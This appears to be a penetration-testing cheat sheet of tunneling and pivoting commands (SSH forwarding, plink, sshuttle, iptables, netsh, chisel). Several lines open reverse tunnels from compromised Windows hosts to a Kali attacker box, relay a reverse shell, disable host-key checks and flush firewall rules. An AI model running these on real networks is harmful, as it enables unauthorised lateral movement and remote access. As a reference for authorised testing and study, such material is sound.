Skip to content

Tunneling

Port Redirection and Tunneling GPLv3 license

Rinetd

# cat /etc/rinetd.conf
# bindadress    bindport  connectaddress  connectport
0.0.0.0 80 142.250.200.142 80

SSH

Local PortForwarding 

ssh -N -L 0.0.0.0:445:192.168.1.110:445 student@10.11.0.128
ssh -i /root/covid19/covid19_rsa root@78.110.29.177 -p 2610 -fNT -L 0.0.0.0:7788:localhost:2610
ssh -p 2222 -L 5555:localhost:5555 kristi@10.10.10.247

Remote PortForwarding 

ssh -N -R 10.11.0.4:2221:127.0.0.1:3306 kali@10.11.0.4
ssh -f -N -R 1122:10.5.5.11:22 -R 13306:10.5.5.11:3306 -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -i /tmp/keys/id_rsa kali@10.11.0.4

Dynamic PortForwarding 

ssh -N -D 127.0.0.1:8080 student@10.11.0.128
ssh -fNT -D 127.0.0.1:8899 sean@10.11.1.251
ssh -f -N -R 1080 -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -i /dev/shm/k/id_rsa lorka@192.168.119.221 #tunel inverso dinamico

cat /etc/proxychains.conf
...

[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4  127.0.0.1 8080

Plink.exe

# exposes the RDP port of the machine in the port 3390 of the SSH Server
plink -l root -pw toor ssh-server-ip -R 3390:127.0.0.1:3389  

#Dinamic
plink.exe 10.1.1.1 -P 22 -C -N -D 1080 -l KALIUSER -pw PASS

#misc
plink.exe -ssh -l kali -pw ilak -R 10.11.0.4:1234:127.0.0.1:3306 10.11.0.4
cmd.exe /c echo y | plink.exe -ssh -l kali -pw ilak -R 10.11.0.4:1234:127.0.0.1:3306 10.11.0.4

Sshuttle

sshuttle -r username@sshserver 0.0.0.0/0 # redirigir todo el trafico
sshuttle --dns -vr root@52.16.151.33 0/0 --ssh-cmd 'ssh -i cert.pem' # redirigir todo el trafico conectando con certificado
sshuttle --dns -r username@sshserver 0/0 # redirigir todo el trafico y las peticiones DNS
sshuttle -r root@174.138.1.75 0.0.0.0/0 --ssh-cmd 'ssh -i jambo.pem' -x 192.168.1.0/24 -D # como daemon y excluyendo mi subnet
sshuttle -r root@192.168.229.44 172.16.229.0/24 -D

Iptables

Clear Rules 

iptables -F
iptables -X
iptables -t nat -F
iptables -t nat -X
iptables -t mangle -F
iptables -t mangle -X
iptables -P INPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT
iptables -L -v -n -t nat

Puente iptables 

sysctl net.ipv4.ip_forward=1
sysctl --system
iptables -t nat -I PREROUTING --src 0/0 -p tcp --dport 2610 -j DNAT --to-destination 77.112.26.111:22
iptables -t nat -A POSTROUTING -j MASQUERADE

NETSH

# kali(192.168.119.224) -- win10(172.16.224.10) -- win2016(172.16.224.5)
# get rshell from win2016 (sending to win10 port 4444) to kali on port 4445
netsh advfirewall firewall add rule name="forwardrule" protocol=TCP dir=in localport=4444 action=allow
netsh interface portproxy add v4tov4 listenport=4444 listenaddress=172.16.224.10 connectport=4445 connectaddress=192.168.119.224

HTTPTunnel

hts --forward-port localhost:8888 1234
htc --forward-port 8080 10.11.0.128:1234

Chisel

Windows port 445 to kali port 4446
1. On kali
chisel server --port 80 --reverse

2. On Windows
.\chisel.exe client 192.168.119.205:80 R:4446:127.0.0.1:445
Proxy Socks5
1. On kali
chisel server --socks5 --reverse --port 80

2. On Windows
chisel.exe client 192.168.119.220:80 R:8899:socks

3. Proxychains config
socks5 127.0.0.1 8899